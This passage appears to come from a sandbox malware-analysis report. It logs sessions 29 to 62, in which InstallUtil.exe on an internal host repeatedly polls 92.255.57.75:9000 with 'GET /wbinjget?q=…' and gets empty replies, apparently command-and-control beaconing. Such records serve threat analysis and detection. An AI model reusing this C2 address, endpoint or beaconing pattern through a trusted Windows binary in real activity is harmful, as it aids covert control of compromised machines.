29	192.168.2.11	49943	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:39.811650991 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:41.137062073 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:40 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.11	49949	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:41.373476982 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:42.700011969 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:42 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.11	49950	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:42.935051918 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:44.262701035 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:44 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.11	49956	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:44.496937037 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:45.820590973 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:45 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.11	49962	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:46.044333935 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:47.372617960 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:47 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.11	49964	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:47.608690023 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:48.933342934 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:48 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.11	49969	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:49.171967030 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:50.496335030 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:50 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.11	49975	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:50.731791973 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:52.057125092 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:51 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.11	49981	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:52.295089006 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:53.620085001 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:53 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.11	49982	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:53.857055902 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:55.184206963 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:54 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.11	49988	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:55.420690060 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:56.746710062 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.11	49994	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:57.059936047 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:58.384850025 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:58 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.11	49997	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:39:58.623289108 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:39:59.950623035 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:39:59 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.11	50002	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:00.185700893 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:01.512737989 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:01 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.11	50008	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:01.747684956 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:03.075063944 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:02 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.11	50014	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:03.309982061 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:04.635231018 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:04 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.11	50016	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:04.874437094 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:06.199878931 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:05 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.11	50021	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:06.443285942 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:07.766227961 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:07 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.11	50027	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:08.000057936 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:09.327157974 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:08 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.11	50029	92.255.57.75	9000

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:09.560359955 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:10.886804104 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:10 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.11	50035	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:11.122185946 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:12.445844889 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:12 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.11	50041	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:12.689181089 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:14.016093016 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:13 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.11	50047	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:14.250920057 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:15.572999954 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:15 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.11	50048	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:15.814512014 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:17.140012026 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:16 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.11	50049	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:17.377058983 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:18.700391054 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:18 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.11	50050	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:18.936104059 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:20.261483908 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.11	50051	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:20.500138998 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:21.824381113 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:21 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.11	50052	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:22.063498020 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:23.393975973 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:23 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.11	50053	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:23.637396097 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:24.956221104 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:24 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.11	50054	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:25.185765028 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:26.509690046 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:26 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.11	50055	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:26.733403921 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:28.063386917 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.11	50056	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:28.299192905 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:29.622608900 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:29 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.11	50057	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 08:40:29.916369915 CET	86	OUT	GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1 Host: 92.255.57.75:9000
Dec 17, 2024 08:40:31.209764957 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Tue, 17 Dec 2024 07:40:30 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.11	50058	92.255.57.75	9000	8852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
